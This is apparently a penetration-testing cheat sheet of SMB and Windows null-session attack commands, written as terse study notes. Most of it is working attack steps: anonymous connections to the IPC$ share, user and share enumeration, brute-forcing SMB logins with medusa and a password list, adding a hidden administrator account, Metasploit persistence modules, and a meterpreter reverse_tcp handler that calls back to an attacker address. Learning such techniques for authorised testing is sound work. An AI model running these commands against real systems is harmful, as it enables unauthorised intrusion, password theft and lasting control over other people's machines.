SMB and null sessions

nbtstat -A ip net view ip

linux nmblookup -A ip smbclient -L //192.168.1.1 -N

Smbclient can also display administrative shares that are hidden when using standard windows tools

Null sessions are a piece of history of Windows hacking.

Check for Null session attack:

verify, exploit the IPC$ administrative share (try to connect without valid creds)

net use \target ip\IPC$ '' /u:''

smbclient //ip/IPC$ -N

enum -S ip (enum shares) enum -U ip (enum users) enum -P ip (check pass policy)

enum4linux

Check pass policy before running auth attack lets you fine-tune an attack tool to: prevent account lockouts prevent FPs choose a dictionary or adjust bruteforcer config

net user admin pass /add net localgroup administrators admin /add

xfreerdp /u:"admin" /v:10.2.29.226:3389

run persistence -U -i 5 -p 443 -r 10.10.11.3

background use exploit/windows/local/persistence_service show options

set SESSION 1 exploit

exploit/multi/handler

background sessions -K

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.15.2 set LPORT 4444 exploit

/root/Desktop/wordlists/100-common-passwords.txt

smbmap -u guest -d EVILCORP -H 192.166.155.3

medusa -M smbnt -h 192.166.155.3 -u william -P /root/Desktop/wordlists/100-common-passwords.txt

enumerate Shares (to find hidden shares)

enum4linux -s ~/Desktop/wordlists/100-common-passwords.txt demo.host.local

Last updated

Was this helpful?